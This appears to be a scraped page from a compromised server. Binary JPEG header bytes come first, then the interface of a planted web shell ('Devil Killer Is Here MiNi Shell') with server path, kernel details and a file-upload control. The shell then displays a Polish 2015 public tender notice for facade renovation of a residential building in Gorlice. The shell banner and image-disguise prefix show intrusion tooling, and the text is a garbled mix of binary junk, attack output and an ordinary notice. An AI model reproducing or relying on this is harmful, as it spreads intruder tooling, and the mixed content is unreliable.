JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150703/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150703/164496-N-2015.html

<p class="kh_header"><b>Gorlice: Wykonanie robót budowlanych I etapu remontu i rewaloryzacji konserwatorskiej elewacji budynku mieszkalnego wielorodzinnego przy ul. Bieckiej 6 w Gorlicach</b><br>
<b>Numer ogłoszenia: 164496 - 2015; data zamieszczenia: 03.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gorlickie Towarzystwo Budownictwa Społecznego Sp. z o.o. , Plac Kościelny 2, 38-300 Gorlice, woj. małopolskie, tel. 18 353 73 10, faks 18 353 73 10.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka, inwestor zastępczy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót budowlanych I etapu remontu i rewaloryzacji konserwatorskiej elewacji budynku mieszkalnego wielorodzinnego przy ul. Bieckiej 6 w Gorlicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2.1. Wykonanie I-go etapu robót budowlanych w zakresie remontu i rewaloryzacji konserwatorskiej oraz odtworzenia detali architektonicznych elewacji na budynku mieszkalnym wielorodzinnym przy ul. Bieckiej 6 w Gorlicach będącym we Wspólnocie Mieszkaniowej w zakresie określonym dokumentacją projektową, wytycznymi Wojewódzkiego Konserwatora Zabytków, przedmiarami robót, specyfikacjami technicznymi wykonania i odbioru robót, między innymi:
1. Wykonawca w kosztach pośrednich pokryje koszt pracy zawodowego konserwatora  zabytkowych dzieł sztuki i kierownika kierującego robotami budowlanymi, posiadającego uprawnienia do prowadzenia i nadzorowania prac konserwatorsko restauratorskich                 w zakresie prac renowacyjnych i odtworzeniowych historycznego wystroju elewacji oraz okładziny kamiennej cokołu budynku. 
2. Przedstawione w dokumentacji projektowej rozwiązania remontu elewacji są zaopiniowane ze stanowiska konserwatorskiego pozytywnie, z warunkiem konserwacji wszystkich istniejących elementów oraz uzupełnienia uszkodzonych elementów wystroju sztukatorskiego i kowalskiego elewacji wyposażonych w te elementy oraz konserwacji          i właściwego uzupełnienia cokołu kamiennego budynku,   
3. Przedmiot zamówienia obejmuje m.in. roboty przygotowawcze, zabezpieczające oraz rozbiórkowe, zagospodarowanie placu budowy, a nadto :
1) częściowe zajęcie pasa drogowego na szerokości chodnika,
2) postawienie i rozbiórka rusztowań,
3) demontaż obróbek blacharskich, orynnowania i wykonanie nowych, 
4) wydłużenie okapu dachu,
5) usunięcie nakrapianki cementowej ze ścian zewnętrznych, 
6) częściową wymianę pokrycia dachowego od strony Stróżowianki z blachy trapezowej na blachę płaską powlekaną w kolorze grafitowym, elewacja południowo-zachodnia, 
7) montaż nowych wyłazów dachowych o wymiarach minimum 80cm x 80cm,  
8) naprawę pęknięć ścian zgodnie z projektem remontu i wzmocnień elementów budynku  innowacyjnym systemem naprawczym i wzmacniającym wszelkiego rodzaju konstrukcje ceglane i betonowe firmy HELIFIX,
9) uszczelnienie powierzchownych rys żywicą ASODUR EK za pomocą iniekcji ciśnieniowej,
10) zabezpieczenie dylatacji sznurem i profilem systemowym, 
11) rozbiórkę balkonów od strony podwórka z naprawą uszkodzonych miejsc po rozbiórce i wymianą balustrad,
12) remont i konserwacja lica kamiennego cokołu budynku zestawem atestowanych materiałów renowacyjnych systemu naprawczego Firmy REMMERS, 
13) wykonanie izolacji pionowej przeciwwilgociowej z materiałów naprawczych systemu Ceresit. Izolacja bitumiczna CP48 o łącznej grubości 4mm zbrojona siatką,
14) remont loggii i balkonów materiałami naprawczymi systemu Ceresit z zastosowaniem izolacji przeciwwilgociowych  poziomych, posadzkami cementowymi zbrojonymi, posadzkami z płytek Gres na zaprawie elastycznej, fugowaniem wodoodpornym, podwyższeniem balustrad oraz wymianą, renowacją spodu loggii i balkonów materiałami naprawczymi systemu Schomburg i malowanie farbą nanosilikonową CT 49, 
15) wymianę rur spustowych, parapetów na wspornikach z płaskownika 40x1,5 i obróbek z blachy płaskiej powlekanej  w kolorze grafitowym, 
16) remont kanalizacji deszczowej w obrębie elewacji wraz z remontem drenażu oraz wymianą na nowe rury PCW, 
17) wymianę drzwi wejściowych na aluminiowe z reofili ciepłych, szybami bezpiecznymi, zamkami, samozamykaczami w kolorystyce według projektu, 
18) demontaż luksferów i zamurowanie otworów, wymiana okien piwnicznych, na klatkach schodowych, strychowych na okna PVC co najmniej 5-o komorowe, z nawiewnikami, z  klamkami zamykanymi na klucz na klatkach schodowych w kolorze białym. Okna PCV w piwnicach uchylne.
Stolarka okienna PCV winna posiadać następujące ogólne dane techniczne: 
        - profil co najmniej pięciokomorowy z nieplastyfikowanego PCV zakwalifikowanego do 
           materiałów niezapalnych, wewnątrz wzmocnienie z kształtownika nierdzewnego, 
           o współczynniku  U = 1,5 W/m2K
         - szyba zespolona o współczynniku nie większym niż U = 1,1 W/m2K,
        - łączniki między oknami ze wzmocnieniem z kształtownika nierdzewnego, 
        - okna wyposażone w nawiewniki higrosterowalne w górnej części futryn, 
        - wykonanie skrzydeł w oknie rozwieralno-uchylnych na klatkach schodowych, 
        - mocowanie kotwami zgodne z załączonym  do okna schematem montażu,  
        - dostosowanie wymiarów i montażu do wymiarów ocieplonych  ościeżnic,  
        - uszczelki szybowe, przeciwkurczowe, 
        - kolor biały,
        - pianka poliuretanowa - jednoskładnikowa - do uszczelniania i ocieplania stolarki po 
           wbudowaniu, 
        - zastosowany system wyrobu i montażu okien winien uwzględniać normy obciążeń 
           wiatrem według PN-77/B02011 , dopuszczalne ugięcia elementów okna, wytrzymałość 
           metalowych kształtowników wzmacniających, spełniać warunki zachowania
          szczelności na przenikalność wody i prawidłową infiltracje powietrza.    
        - gwarancje, 
        - instrukcje użytkowania,    
19) prace remontowe i konserwatorskie w zakresie elewacji - zabezpieczenie stolarki okiennej i drzwiowej, balkonów, loggii, kostki betonowej itp., skucie odstających tynków zewnętrznych o gzymsów, naprawa ubytków murów z cegły oraz wzmocnienie pęknięć murów w systemie firmy Remmers lub innym równoważnym, wykonanie nowych tynków renowacyjnych boniowanych w systemie Ceresit lub równoważnym, wyszpachlowanie tynków gr. do 0,5cm, ułożenie tynku mineralnego gr. 5mm, dwukrotne malowanie farbą nanosilikonową CT49. Farba nanosilikonowa CT 49 Silix XD jest wysoce hydrofobowa i paroprzepuszczalna, przeznaczona do malowania elewacji o właściwościach i cechach technicznych: 
znikoma nasiąkliwość,
wysoce paroprzepuszczalna,
samoczyszcząca, wysoce odporna na zabrudzenia,
wysoce odporna na rozwój grzybów, alg i pleśni, 
wysoce trwała na promieniowanie ultrafioletowe UV i warunki atmosferyczne np. kwaśne deszcze, 
tiksotropowa, 
przeznaczona także do malowania miejsc narażonych na porażenie biologiczne: grzyby, algi i inne, 
dostępny jest wybór w pełnej palecie barw  
szczególnie zalecana jest w obiektach zabytkowych, na tynkach renowacyjnych oraz na wszelkich powierzchniach, gdzie wymagana jest wysoka estetyka i trwałość powłoki.      W przypadku malowania elewacji budynku przy ul. Bieckiej w Gorlicach ma to podstawowe znaczenie ze względu na zastosowanie malowania elewacji w kolorze białym, a wybranych detali np. gzymsów w kolorze jasnym, piaskowca. Ze względu na właściwości w zakresie mostkowania rys tynku, Farba nanosilikonowa CT 49 Silix XD jest szczególnie zalecana do wykonania wymalowań tynków mineralnych, które będą nałożone przed malowaniem, na elewację budynku, zgodnie z projektem. Zamawiający ze względu na warunki określone w audycie energetycznym i dokumentacji projektowej nie dopuszcza zastosowania innej metody malowania elewacji, aniżeli nałożenie powłoki malarskiej nanosilikonowej.       
20) montaż gzymsu koronacyjnego, wykonanie odlewów i montaż dolnej części gzymsu koronacyjnego, wykonanie i montaż  odlewów ozdobnych detali architektoniczno - konserwatorskich elewacji, wykonanie i montaż pozostałych gzymsów, wykonanie i montaż ozdobnych obramowań okiennych, 
21) rekonstrukcja  i odtworzenie odlewów z roślinami w strefie poddasza, 
22) dwukrotne malowanie powyższych zdobień i gzymsów elewacji farbą nanosilikonową w kolorystyce określonej w projekcie,    
23) przemurowanie kominów nad dachem z wykonaniem czap kominowych, 
24) wykonanie nowej instalacji odgromowej budynku,
25) rozebranie i odtworzenie opaski w obrębie elewacji, 
26) wywóz i utylizacja gruzu  i innych odpadów.
2.2. Zamawiający informuje, że ewentualne nazwy własne, podane w dokumentach stanowiących opis przedmiotu zamówienia są nazwami przykładowymi i winny być interpretowane jako definicje standardów i jakości, a nie jako nazwy materiałów do zastosowania. Zamawiający dopuszcza użycie materiałów równoważnych, lecz parametry użytego materiału nie mogą odbiegać od parametrów danego materiału wynikających z dokumentów stanowiących opis przedmiotu zamówienia. 
      W przypadku proponowania przez wykonawcę materiałów równoważnych do zawartych                        w dokumentach opisujących przedmiot zamówienia, do oferty należy załączyć zestawienie zastosowanych materiałów równoważnych. Zastosowane materiałów równoważnych oceniane będzie pod względem zgodności (równoważności) z materiałami opisanymi w dokumentacji opisującej przedmiot zamówienia. Zgodnie z przepisami art. 30 ust. 5 ustawy Pzp. Wykonawca winien wykazać, że oferowane materiały równoważne spełniają określone w dokumentach stanowiących opis przedmiotu zamówienia wymogi. W przypadku niewykazania równoważności, Zamawiający zgodnie z art. 89 ust. 1 pkt 2 ustawy Pzp odrzuci ofertę jako niezgodną z SIWZ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.10.00.00-8, 45.40.00.00-1, 45.21.10.00-9, 45.45.30.00-7, 45.26.21.20-8, 45.32.10.00-3, 45.21.12.25-6, 45.11.12.20-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Składana oferta musi być zabezpieczona wadium w wysokości:  15.000,00 zł    
(słownie: sześć tysięcy złotych)
2. Wadium może być wnoszone w następujących formach:
w pieniądzu (wyłącznie przelewem na rachunek bankowy zamawiającego),
-	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie 	kasy jest zawsze poręczeniem pieniężnym,
w gwarancjach bankowych,
w gwarancjach ubezpieczeniowych,
w poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust.5 pkt.2 Ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U.  Nr 109, poz.1158 z późn. zm.).
3. Wadium wnoszone w formie pieniądza należy wpłacić na konto zmawiającego: GORLICKIE TOWARZYSTWO BUDOWNICTWA SPOŁECZNEGO SPÓŁKA Z O. O.  Bank BGŻ BNP Paribas S.A. Oddział w Gorlicach ul. Mickiewicza 22  38-300 Gorlice  Nr 39 2030 0045 1170 0000 0534 8960 
4. Wadium wnoszone w innej formie niż w pieniądzu (przelew)  należy złożyć  w oryginale w siedzibie zamawiającego przy ul.
Plac Kościelny 2 (księgowość). Nie dopuszcza się składania wadium (w innej formie niż w pieniądzu) wewnątrz oferty !
Wadium wnoszone w innej formie niż w pieniądzu winno zabezpieczać złożoną ofertę w okresie związania ofertą tj. 30 dni, licząc od terminu wskazanego w pkt.5, co musi wynikać z treści złożonego dokumentu. 
5. TERMIN WNIESIENIA WADIUM W KAŻDEJ FORMIE:
do dnia  20.07.2015 r. do godz. 10.00
Uwaga !
W przypadku wniesienia wadium w formie pieniądza za termin skutecznego wniesienia wadium, przyjmuje się datę uznania na rachunku Zamawiającego !</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się wyłącznie wykonawcy którzy spełniają warunki określone w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (t.j. Dz.U. z 2013r. poz. 907 z późn. zm.), a także pozostałe warunki określone w SIWZ oraz nie podlegają wykluczeniu na podstawie art. 24 ust. 1, ust. 2 i ust. 2a.
W przypadku gdy wykonawcy wspólnie ubiegają się o udzielenie zamówienia (np. konsorcjum), do oferty należy dołączyć pełnomocnictwo, w którym członkowie konsorcjum umocowali jeden podmiot do reprezentowania wszystkich w postępowaniu o udzielenie zamówienia, zgodnie z art. 23 ust. 2 Pzp, które musi obejmować również wszystkie czynności podejmowane przez wykonawców w trakcie postępowania i zawarcia umowy. 
Jednocześnie żaden z podmiotów występujących wspólnie nie  może podlegać wykluczeniu na podstawie art. 24 ust. 1, ust. 2 i ust. 2a ustawy Pzp.
Warunki udziału w postępowaniu:
Wykonawca składa  wraz z ofertą oświadczenie o spełnieniu warunków udziału w postępowaniu oraz dokumenty potwierdzające spełnienie tych warunków.
O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy Pzp, dotyczące: 
1) posiadania wiedzy i doświadczenia,
2) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
3) sytuacji ekonomicznej i finansowej.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. za spełnienie powyższego warunku zamawiający uzna wykonanie z należytą starannością w okresie pięciu ostatnich lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, przed dniem wszczęcia postępowania, co najmniej dwóch robót budowlanych, odpowiadających robotom budowlanym stanowiącym przedmiot niniejszego zamówienia, przez co Zamawiający rozumie wykonanie robót remontowo - renowacyjnych z odtworzeniem odlewów i montażem ozdobnych detali architektonicznych w obiektach podlegających ochronie Wojewódzkiego Konserwatora Zabytków, z czego każde z wykonanych zamówień o wartości nie mniejszej niż 300.000 zł brutto, z podaniem ich rodzaju, wartości, daty i miejsca wykonania, według wzoru stanowiącego załącznik nr 6 do SIWZ, oraz załączeniem poświadczenia lub innych dokumentów - jeżeli z przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia - określających, że roboty zostały wykonane w sposób należyty oraz wskazujących że zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Wyszczególnione potwierdzenie spełnienia powyższego warunku dotyczy wykonawcy lub podwykonawcy lub innego podmiotu zobowiązanego do udostępnienia oferentowi zasobów niezbędnych do wykonania zamówienia - załącznik nr 5a do SIWZ
Zamawiający dokona oceny spełnienia wymaganego warunku wg formuły: spełnia  - nie spełnia.
2. potwierdzenie wykonania co najmniej dwóch robót w zakresie zabezpieczenia systemowego pęknięć ścian wraz ze wzmocnieniem elementów budynku systemem naprawczym i wzmacniającym wszelkiego rodzaju konstrukcje ceglane i betonowe, z czego każde z wykonanych zamówień o wartości nie mniejszej niż 20.000 zł brutto , z podaniem ich rodzaju, wartości, daty i miejsca wykonania,  według wzoru stanowiącego załącznik nr 6 do SIWZ, oraz załączeniem poświadczenia lub innych dokumentów - jeżeli z przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia - określających, że roboty zostały wykonane w sposób należyty oraz wskazujących że zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Wyszczególnione potwierdzenie spełnienia powyższego warunku  dotyczy wykonawcy lub podwykonawcy lub innego podmiotu zobowiązanego do udostępnienia oferentowi zasobów niezbędnych do wykonania zamówienia - załącznik nr 5a do SIWZ
Zamawiający dokona oceny spełnienia wymaganego warunku wg formuły: spełnia  - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje lub będzie dysponował  niżej wymienionymi  narzędziami, wyposażeniem zakładu  i urządzeniami technicznymi : 
2.1 Rusztowaniami zewnętrznymi o powierzchni co najmniej 400 m2
2.2. Formami do odlewów detali architektonicznych gzymsu koronacyjnego, zdobień roślinnych, pozostałych detali i ozdób architektonicznych elewacji.   
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, załącznik nr 4 do SIWZ.  
Zamawiający dokona oceny spełnienia wymaganego warunku wg formuły: spełnia  - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie powyższego warunku, zamawiający uzna dysponowanie potencjałem kadrowym niezbędnym do realizacji zamówienia, w tym przynajmniej: 
   1.1 jedną osobę spełniającą wymagania określone w par. 24 ust. 1 i 2 rozporządzenia Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011r. w sprawie prowadzenia prac konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych (Dz.U. nr 165, poz. 987 z późn. zm.) tj. posiadającą wymagane uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej i posiadającą co najmniej 2 letnią praktykę zawodową na budowie przy zabytkach nieruchomych wpisanych do rejestru zabytków  W przypadku wykonawców wspólnie ubiegających się o zamówienie osobę spełniającą powyższe wymagania składa przynajmniej jeden z wykonawców. 
1.2 jedną osobę spełniającą wymagania określone w par. 22 ust. 1 w.w rozporządzenia Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011 r. par. 22 ust. 1. Prace konserwatorskie, prace restauratorskie oraz badania konserwatorskie może prowadzić, w zakresie specjalności określonej w dyplomie ukończenia studiów osoba, która posiada tytuł zawodowy magistra uzyskany po ukończeniu studiów wyższych: 1/ na kierunku konserwacja i restauracja dzieł sztuki lub 2/ w specjalności w zakresie konserwacji zabytków - oraz  odbyła po ukończeniu tych studiów co najmniej 12 miesięczną praktykę zawodową w zakresie konserwacji lub badania zabytków wpisanych do rejestru zabytków oraz dokumenty potwierdzające jej wykształcenie, doświadczenie i kwalifikacje zawodowe. W przypadku wykonawców wspólnie ubiegających się o zamówienie osobę spełniającą powyższe wymagania składa przynajmniej jeden z wykonawców. 
1.3  jedną osobę spełniającą wymagania określone w art. 12 ust. 1 pkt. 2 ustawy Prawo budowlane uprawnioną do kierowania budową lub innymi robotami budowlanymi. W przypadku wykonawców wspólnie ubiegających się o zamówienie osobę spełniającą powyższe wymagania składa przynajmniej jeden z wykonawców.  załącznik nr 5 do SIWZ. 
Zamawiający dokona oceny spełnienia wymaganego warunku wg formuły: spełnia  - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego warunku Zamawiający uzna wykazaniem się przez Wykonawcę dysponowaniem środkami finansowymi lub zdolnością kredytową na kwotę nie mniejszej niż  300.000 złotych oraz musi być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na wartość co najmniej 300.000 zł     w zakresie podstawowym oraz załączeniem informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy i opłaconej polisy lub innego dokumentu potwierdzającego  posiadanie ubezpieczenia odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.
Zamawiający dokona oceny spełnienia wymaganego warunku wg formuły: spełnia  - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

